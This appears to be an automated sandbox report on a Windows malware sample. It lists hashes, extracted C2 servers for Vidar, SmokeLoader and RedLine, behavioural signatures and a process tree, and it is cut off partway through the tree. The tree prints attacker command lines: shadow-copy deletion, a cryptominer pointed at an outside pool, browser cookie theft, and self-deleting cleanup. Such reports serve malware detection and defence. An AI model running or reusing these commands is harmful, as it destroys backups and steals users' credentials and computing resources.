Resubmissions

13-08-2021 10:16

210813-wpta271jdx 10

08-08-2021 23:00

210808-fgs5g9pxfs 10

07-08-2021 23:12

210807-g2jw1lmd4a 10

07-08-2021 16:10

210807-51nhct4kfx 10

06-08-2021 23:43

210806-gc2271nxwj 10

06-08-2021 06:00

210806-f443x39x8a 10

05-08-2021 17:08

210805-97y6banvvx 10

04-08-2021 17:25

210804-hkxx2ntr8x 10

04-08-2021 12:12

210804-rjbg4b4y7n 10

03-08-2021 17:12

210803-r2h7ytjwqj 10

Analysis

  • max time kernel
    43s
  • max time network
    1860s
  • platform
    windows7_x64
  • resource
    win7v20210410
  • submitted
    26-07-2021 12:54

General

  • Target

    8 (19).exe

  • Size

    3.0MB

  • MD5

    bb072cad921aa5ce8b97706ce01bc570

  • SHA1

    18bf034906c1341b7817e7361ad27a4425d820bd

  • SHA256

    817a50d00909383bbef41e6f4e61b527d55f0873bcf745b29dbba75f52fe2e97

  • SHA512

    d40e5f77d882ed29bd9de5a6848072e2f81cd02176955e2b1a4aedcdf4eb687d77bebe33cef0c7d702bc828181755f86e2564523d476adbb785f396a5ce1d474

Malware Config

Extracted

Family

vidar

Version

39.6

Botnet

933

C2

https://sslamlssa1.tumblr.com/

Attributes
  • profile_id

    933

Extracted

Family

smokeloader

Version

2020

C2

http://conceitosseg.com/upload/

http://integrasidata.com/upload/

http://ozentekstil.com/upload/

http://finbelportal.com/upload/

http://telanganadigital.com/upload/

http://readinglistforjuly1.xyz/

http://readinglistforjuly2.xyz/

http://readinglistforjuly3.xyz/

http://readinglistforjuly4.xyz/

http://readinglistforjuly5.xyz/

http://readinglistforjuly6.xyz/

http://readinglistforjuly7.xyz/

http://readinglistforjuly8.xyz/

http://readinglistforjuly9.xyz/

http://readinglistforjuly10.xyz/

http://readinglistforjuly1.site/

http://readinglistforjuly2.site/

http://readinglistforjuly3.site/

http://readinglistforjuly4.site/

http://readinglistforjuly5.site/

rc4.i32
rc4.i32
rc4.i32
rc4.i32

Extracted

Family

redline

Botnet

AniNEW

C2

akedauiver.xyz:80

Extracted

Family

redline

Botnet

sel21

C2

salkefard.xyz:80

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

vidar

Version

39.7

Botnet

921

C2

https://shpak125.tumblr.com/

Attributes
  • profile_id

    921

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 2 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Process spawned unexpected child process 2 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 6 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • suricata: ET MALWARE Generic Password Stealer User Agent Detected (RookIE)
  • suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request
  • suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
  • suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 5 IoCs
  • ASPack v2.12-2.42 18 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Creates new service(s) 1 TTPs
  • Downloads MZ/PE file
  • Executes dropped EXE 27 IoCs
  • Modifies Windows Firewall 1 TTPs
  • VMProtect packed file 1 IoCs

    Detects executables packed with VMProtect commercial packer.

  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Loads dropped DLL 64 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
  • Themida packer 1 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 10 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 5 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 5 IoCs
  • Interacts with shadow copies 2 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Kills process with taskkill 6 IoCs
  • Modifies data under HKEY_USERS 6 IoCs
  • Modifies registry class 15 IoCs
  • Modifies system certificate store 2 TTPs 6 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k netsvcs
    1⤵
    • Suspicious use of NtCreateUserProcessOtherParentProcess
    • Drops file in System32 directory
    • Suspicious use of SetThreadContext
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:860
    • C:\Windows\system32\taskeng.exe
      taskeng.exe {0EDCF0E2-243D-4E75-AB5C-54C0A4118AEC} S-1-5-21-2513283230-931923277-594887482-1000:MRBKYMNO\Admin:Interactive:[1]
      2⤵
        PID:1996
        • C:\Users\Admin\AppData\Roaming\vcwtwdd
          C:\Users\Admin\AppData\Roaming\vcwtwdd
          3⤵
            PID:796
          • C:\Users\Admin\AppData\Roaming\jtwtwdd
            C:\Users\Admin\AppData\Roaming\jtwtwdd
            3⤵
              PID:2356
              • C:\Users\Admin\AppData\Roaming\jtwtwdd
                C:\Users\Admin\AppData\Roaming\jtwtwdd
                4⤵
                • Executes dropped EXE
                PID:2708
            • C:\Users\Admin\AppData\Local\e49accae-e92c-47a7-8bb3-c05b9eb0b936\1BFA.exe
              C:\Users\Admin\AppData\Local\e49accae-e92c-47a7-8bb3-c05b9eb0b936\1BFA.exe --Task
              3⤵
                PID:2492
                • C:\Users\Admin\AppData\Local\e49accae-e92c-47a7-8bb3-c05b9eb0b936\1BFA.exe
                  C:\Users\Admin\AppData\Local\e49accae-e92c-47a7-8bb3-c05b9eb0b936\1BFA.exe --Task
                  4⤵
                    PID:2040
                • C:\Users\Admin\AppData\Local\e49accae-e92c-47a7-8bb3-c05b9eb0b936\1BFA.exe
                  C:\Users\Admin\AppData\Local\e49accae-e92c-47a7-8bb3-c05b9eb0b936\1BFA.exe --Task
                  3⤵
                    PID:1384
                  • C:\Users\Admin\AppData\Roaming\sdwtwdd
                    C:\Users\Admin\AppData\Roaming\sdwtwdd
                    3⤵
                      PID:2952
                • C:\Windows\system32\services.exe
                  C:\Windows\system32\services.exe
                  1⤵
                    PID:464
                    • C:\Windows\system32\svchost.exe
                      C:\Windows\system32\svchost.exe -k SystemNetworkService
                      2⤵
                      • Checks processor information in registry
                      • Modifies data under HKEY_USERS
                      • Modifies registry class
                      PID:1400
                    • C:\Windows\SysWOW64\yntqldpq\implxgdz.exe
                      C:\Windows\SysWOW64\yntqldpq\implxgdz.exe /d"C:\Users\Admin\AppData\Local\Temp\66A9.exe"
                      2⤵
                        PID:3064
                        • C:\Windows\SysWOW64\svchost.exe
                          svchost.exe
                          3⤵
                            PID:2792
                            • C:\Windows\SysWOW64\svchost.exe
                              svchost.exe -o fastpool.xyz:10060 -u 9rLbTvsApFs3i3ojk5hDKicMNRQbxxFGwJA2hNC6NoZZDQN5tTFbhviFm4W3koxSrPg87Lnif7qxFYh9xpTJz1cT6B17Ph4.50000 -p x -k -a cn/half
                              4⤵
                                PID:2216
                          • C:\Windows\system32\vssvc.exe
                            C:\Windows\system32\vssvc.exe
                            2⤵
                              PID:1704
                          • C:\Users\Admin\AppData\Local\Temp\8 (19).exe
                            "C:\Users\Admin\AppData\Local\Temp\8 (19).exe"
                            1⤵
                            • Loads dropped DLL
                            • Suspicious use of WriteProcessMemory
                            PID:1636
                            • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
                              "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
                              2⤵
                              • Executes dropped EXE
                              • Loads dropped DLL
                              • Suspicious use of WriteProcessMemory
                              PID:1472
                              • C:\Users\Admin\AppData\Local\Temp\7zS0C5F7CF4\setup_install.exe
                                "C:\Users\Admin\AppData\Local\Temp\7zS0C5F7CF4\setup_install.exe"
                                3⤵
                                • Executes dropped EXE
                                • Loads dropped DLL
                                • Suspicious use of WriteProcessMemory
                                PID:1264
                                • C:\Windows\SysWOW64\cmd.exe
                                  C:\Windows\system32\cmd.exe /c sonia_7.exe
                                  4⤵
                                    PID:1828
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 1264 -s 412
                                    4⤵
                                    • Loads dropped DLL
                                    • Program crash
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:112
                                  • C:\Windows\SysWOW64\cmd.exe
                                    C:\Windows\system32\cmd.exe /c sonia_6.exe
                                    4⤵
                                    • Loads dropped DLL
                                    PID:1868
                                  • C:\Windows\SysWOW64\cmd.exe
                                    C:\Windows\system32\cmd.exe /c sonia_5.exe
                                    4⤵
                                    • Loads dropped DLL
                                    PID:912
                                  • C:\Windows\SysWOW64\cmd.exe
                                    C:\Windows\system32\cmd.exe /c sonia_4.exe
                                    4⤵
                                    • Loads dropped DLL
                                    PID:516
                                  • C:\Windows\SysWOW64\cmd.exe
                                    C:\Windows\system32\cmd.exe /c sonia_3.exe
                                    4⤵
                                    • Loads dropped DLL
                                    PID:1484
                                  • C:\Windows\SysWOW64\cmd.exe
                                    C:\Windows\system32\cmd.exe /c sonia_2.exe
                                    4⤵
                                    • Loads dropped DLL
                                    PID:1152
                                  • C:\Windows\SysWOW64\cmd.exe
                                    C:\Windows\system32\cmd.exe /c sonia_1.exe
                                    4⤵
                                    • Loads dropped DLL
                                    • Suspicious use of WriteProcessMemory
                                    PID:328
                              • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                wmic shadowcopy delete
                                2⤵
                                  PID:2164
                              • C:\Users\Admin\AppData\Local\Temp\7zS0C5F7CF4\sonia_3.exe
                                sonia_3.exe
                                1⤵
                                • Executes dropped EXE
                                • Loads dropped DLL
                                • Modifies system certificate store
                                PID:240
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 240 -s 964
                                  2⤵
                                  • Program crash
                                  PID:2988
                              • C:\Users\Admin\AppData\Local\Temp\7zS0C5F7CF4\sonia_2.exe
                                sonia_2.exe
                                1⤵
                                • Executes dropped EXE
                                • Loads dropped DLL
                                • Checks SCSI registry key(s)
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious behavior: MapViewOfSection
                                PID:744
                              • C:\Users\Admin\AppData\Local\Temp\7zS0C5F7CF4\sonia_1.exe
                                "C:\Users\Admin\AppData\Local\Temp\7zS0C5F7CF4\sonia_1.exe" -a
                                1⤵
                                • Executes dropped EXE
                                • Loads dropped DLL
                                PID:1976
                              • C:\Users\Admin\AppData\Local\Temp\7zS0C5F7CF4\sonia_6.exe
                                sonia_6.exe
                                1⤵
                                • Executes dropped EXE
                                • Loads dropped DLL
                                • Adds Run key to start application
                                PID:1728
                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                  2⤵
                                    PID:2708
                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                    2⤵
                                      PID:1316
                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                      2⤵
                                        PID:656
                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                        2⤵
                                          PID:2596
                                      • C:\Users\Admin\AppData\Local\Temp\7zS0C5F7CF4\sonia_4.exe
                                        sonia_4.exe
                                        1⤵
                                        • Executes dropped EXE
                                        • Modifies system certificate store
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:1600
                                        • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                                          "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                                          2⤵
                                          • Executes dropped EXE
                                          • Loads dropped DLL
                                          PID:1132
                                          • C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
                                            "C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"
                                            3⤵
                                            • Executes dropped EXE
                                            • Loads dropped DLL
                                            PID:2116
                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                              4⤵
                                              • Executes dropped EXE
                                              PID:2716
                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                              4⤵
                                                PID:1660
                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                4⤵
                                                  PID:660
                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                  4⤵
                                                    PID:1516
                                                • C:\Users\Admin\AppData\Local\Temp\OLKbrowser.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\OLKbrowser.exe"
                                                  3⤵
                                                  • Executes dropped EXE
                                                  • Loads dropped DLL
                                                  • Suspicious use of SetThreadContext
                                                  PID:2136
                                                  • C:\Users\Admin\AppData\Local\Temp\OLKbrowser.exe
                                                    C:\Users\Admin\AppData\Local\Temp\OLKbrowser.exe
                                                    4⤵
                                                    • Executes dropped EXE
                                                    PID:2320
                                                • C:\Users\Admin\AppData\Local\Temp\setup 326.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\setup 326.exe"
                                                  3⤵
                                                  • Executes dropped EXE
                                                  PID:2180
                                                • C:\Users\Admin\AppData\Local\Temp\setup.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\setup.exe"
                                                  3⤵
                                                  • Executes dropped EXE
                                                  • Loads dropped DLL
                                                  PID:2224
                                                • C:\Users\Admin\AppData\Local\Temp\zhangd.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\zhangd.exe"
                                                  3⤵
                                                  • Executes dropped EXE
                                                  • Loads dropped DLL
                                                  PID:2244
                                                  • C:\Users\Admin\AppData\Local\Temp\zhangd.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\zhangd.exe" -a
                                                    4⤵
                                                      PID:2348
                                                  • C:\Users\Admin\AppData\Local\Temp\Chrome Update.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\Chrome Update.exe"
                                                    3⤵
                                                    • Executes dropped EXE
                                                    PID:2280
                                                    • C:\Windows\system32\WerFault.exe
                                                      C:\Windows\system32\WerFault.exe -u -p 2280 -s 660
                                                      4⤵
                                                      • Program crash
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      PID:2468
                                              • C:\Users\Admin\AppData\Local\Temp\7zS0C5F7CF4\sonia_5.exe
                                                sonia_5.exe
                                                1⤵
                                                • Executes dropped EXE
                                                • Loads dropped DLL
                                                PID:1784
                                                • C:\Users\Admin\Documents\hvwCOwX43fDnhrJZP9AhCVR9.exe
                                                  "C:\Users\Admin\Documents\hvwCOwX43fDnhrJZP9AhCVR9.exe"
                                                  2⤵
                                                  • Executes dropped EXE
                                                  • Checks BIOS information in registry
                                                  • Checks whether UAC is enabled
                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                  PID:2624
                                                • C:\Users\Admin\Documents\97IaaIGvVTSWligwJ1Gt88Ak.exe
                                                  "C:\Users\Admin\Documents\97IaaIGvVTSWligwJ1Gt88Ak.exe"
                                                  2⤵
                                                  • Executes dropped EXE
                                                  PID:2604
                                                  • C:\Users\Admin\Documents\97IaaIGvVTSWligwJ1Gt88Ak.exe
                                                    C:\Users\Admin\Documents\97IaaIGvVTSWligwJ1Gt88Ak.exe
                                                    3⤵
                                                      PID:1624
                                                  • C:\Users\Admin\Documents\3bt0S8QUNFbrtXLOWw8kuLrm.exe
                                                    "C:\Users\Admin\Documents\3bt0S8QUNFbrtXLOWw8kuLrm.exe"
                                                    2⤵
                                                    • Executes dropped EXE
                                                    PID:2596
                                                  • C:\Users\Admin\Documents\dR7RjVrj3Ux8Ntyr1zyp08Gd.exe
                                                    "C:\Users\Admin\Documents\dR7RjVrj3Ux8Ntyr1zyp08Gd.exe"
                                                    2⤵
                                                    • Executes dropped EXE
                                                    PID:2588
                                                    • C:\Users\Admin\Documents\dR7RjVrj3Ux8Ntyr1zyp08Gd.exe
                                                      C:\Users\Admin\Documents\dR7RjVrj3Ux8Ntyr1zyp08Gd.exe
                                                      3⤵
                                                        PID:1720
                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 1720 -s 964
                                                          4⤵
                                                          • Program crash
                                                          PID:900
                                                    • C:\Users\Admin\Documents\SYqIn1zFMZHDWzDH_b0lkvU3.exe
                                                      "C:\Users\Admin\Documents\SYqIn1zFMZHDWzDH_b0lkvU3.exe"
                                                      2⤵
                                                      • Executes dropped EXE
                                                      PID:2580
                                                      • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                        C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                        3⤵
                                                          PID:2448
                                                        • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                          C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                          3⤵
                                                            PID:2788
                                                          • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                            C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                            3⤵
                                                              PID:2640
                                                            • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                              C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                              3⤵
                                                                PID:812
                                                              • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                3⤵
                                                                  PID:1604
                                                                • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                  C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                  3⤵
                                                                    PID:1744
                                                                  • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                    C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                    3⤵
                                                                      PID:2192
                                                                    • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                      C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                      3⤵
                                                                        PID:2944
                                                                    • C:\Users\Admin\Documents\9eVkgW7BmvYFh_RUHtrPpnh2.exe
                                                                      "C:\Users\Admin\Documents\9eVkgW7BmvYFh_RUHtrPpnh2.exe"
                                                                      2⤵
                                                                      • Executes dropped EXE
                                                                      PID:2644
                                                                      • C:\Users\Admin\Documents\9eVkgW7BmvYFh_RUHtrPpnh2.exe
                                                                        "C:\Users\Admin\Documents\9eVkgW7BmvYFh_RUHtrPpnh2.exe"
                                                                        3⤵
                                                                          PID:2232
                                                                      • C:\Users\Admin\Documents\e_8Kvbaz_cbrs9gdGJlrQXTs.exe
                                                                        "C:\Users\Admin\Documents\e_8Kvbaz_cbrs9gdGJlrQXTs.exe"
                                                                        2⤵
                                                                          PID:2652
                                                                        • C:\Users\Admin\Documents\sdIBYu0spubukFa1tEZ69AAb.exe
                                                                          "C:\Users\Admin\Documents\sdIBYu0spubukFa1tEZ69AAb.exe"
                                                                          2⤵
                                                                            PID:2420
                                                                            • C:\Users\Admin\Documents\sdIBYu0spubukFa1tEZ69AAb.exe
                                                                              C:\Users\Admin\Documents\sdIBYu0spubukFa1tEZ69AAb.exe
                                                                              3⤵
                                                                                PID:2536
                                                                            • C:\Users\Admin\Documents\95LS77foLHnoJd2AbM9lUOw3.exe
                                                                              "C:\Users\Admin\Documents\95LS77foLHnoJd2AbM9lUOw3.exe"
                                                                              2⤵
                                                                                PID:2396
                                                                                • C:\Program Files (x86)\Company\NewProduct\jooyu.exe
                                                                                  "C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
                                                                                  3⤵
                                                                                    PID:1876
                                                                                  • C:\Program Files (x86)\Company\NewProduct\customer3.exe
                                                                                    "C:\Program Files (x86)\Company\NewProduct\customer3.exe"
                                                                                    3⤵
                                                                                      PID:2780
                                                                                      • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                        C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                        4⤵
                                                                                          PID:2688
                                                                                        • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                          4⤵
                                                                                            PID:896
                                                                                          • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                            C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                            4⤵
                                                                                              PID:1712
                                                                                            • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                              C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                              4⤵
                                                                                                PID:944
                                                                                            • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                                                                              "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
                                                                                              3⤵
                                                                                                PID:2676
                                                                                            • C:\Users\Admin\Documents\arV9SNcU0726hPJ6sTUs7bDB.exe
                                                                                              "C:\Users\Admin\Documents\arV9SNcU0726hPJ6sTUs7bDB.exe"
                                                                                              2⤵
                                                                                                PID:2344
                                                                                                • C:\Users\Admin\Documents\arV9SNcU0726hPJ6sTUs7bDB.exe
                                                                                                  "C:\Users\Admin\Documents\arV9SNcU0726hPJ6sTUs7bDB.exe"
                                                                                                  3⤵
                                                                                                    PID:456
                                                                                                • C:\Users\Admin\Documents\rSPJEi4TrAZbT_EVH6YYycWn.exe
                                                                                                  "C:\Users\Admin\Documents\rSPJEi4TrAZbT_EVH6YYycWn.exe"
                                                                                                  2⤵
                                                                                                    PID:332
                                                                                                  • C:\Users\Admin\Documents\jBaoso5rZf9nHfbGDyqnLLWZ.exe
                                                                                                    "C:\Users\Admin\Documents\jBaoso5rZf9nHfbGDyqnLLWZ.exe"
                                                                                                    2⤵
                                                                                                      PID:1980
                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                        "C:\Windows\System32\cmd.exe" /c taskkill /im jBaoso5rZf9nHfbGDyqnLLWZ.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\jBaoso5rZf9nHfbGDyqnLLWZ.exe" & del C:\ProgramData\*.dll & exit
                                                                                                        3⤵
                                                                                                          PID:2688
                                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                                            taskkill /im jBaoso5rZf9nHfbGDyqnLLWZ.exe /f
                                                                                                            4⤵
                                                                                                            • Kills process with taskkill
                                                                                                            PID:2488
                                                                                                          • C:\Windows\SysWOW64\timeout.exe
                                                                                                            timeout /t 6
                                                                                                            4⤵
                                                                                                            • Delays execution with timeout.exe
                                                                                                            PID:2544
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS0C5F7CF4\sonia_1.exe
                                                                                                      sonia_1.exe
                                                                                                      1⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Loads dropped DLL
                                                                                                      PID:1496
                                                                                                    • C:\Windows\system32\rUNdlL32.eXe
                                                                                                      rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                      1⤵
                                                                                                      • Process spawned unexpected child process
                                                                                                      PID:1760
                                                                                                      • C:\Windows\SysWOW64\rundll32.exe
                                                                                                        rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                        2⤵
                                                                                                        • Loads dropped DLL
                                                                                                        • Modifies registry class
                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                        PID:1864
                                                                                                    • C:\Windows\system32\rUNdlL32.eXe
                                                                                                      rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                      1⤵
                                                                                                      • Process spawned unexpected child process
                                                                                                      PID:2412
                                                                                                      • C:\Windows\SysWOW64\rundll32.exe
                                                                                                        rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                        2⤵
                                                                                                        • Modifies registry class
                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                        PID:2424
                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 2676 -s 276
                                                                                                      1⤵
                                                                                                      • Program crash
                                                                                                      PID:2200
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\D865.exe
                                                                                                      C:\Users\Admin\AppData\Local\Temp\D865.exe
                                                                                                      1⤵
                                                                                                        PID:2008
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\1BFA.exe
                                                                                                        C:\Users\Admin\AppData\Local\Temp\1BFA.exe
                                                                                                        1⤵
                                                                                                          PID:2248
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\1BFA.exe
                                                                                                            C:\Users\Admin\AppData\Local\Temp\1BFA.exe
                                                                                                            2⤵
                                                                                                              PID:2208
                                                                                                              • C:\Windows\SysWOW64\icacls.exe
                                                                                                                icacls "C:\Users\Admin\AppData\Local\e49accae-e92c-47a7-8bb3-c05b9eb0b936" /deny *S-1-1-0:(OI)(CI)(DE,DC)
                                                                                                                3⤵
                                                                                                                • Modifies file permissions
                                                                                                                PID:1340
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\1BFA.exe
                                                                                                                "C:\Users\Admin\AppData\Local\Temp\1BFA.exe" --Admin IsNotAutoStart IsNotTask
                                                                                                                3⤵
                                                                                                                  PID:2420
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\1BFA.exe
                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\1BFA.exe" --Admin IsNotAutoStart IsNotTask
                                                                                                                    4⤵
                                                                                                                      PID:1968
                                                                                                                      • C:\Users\Admin\AppData\Local\10fa34dc-e975-44e6-a940-a0e4846f7cc4\build2.exe
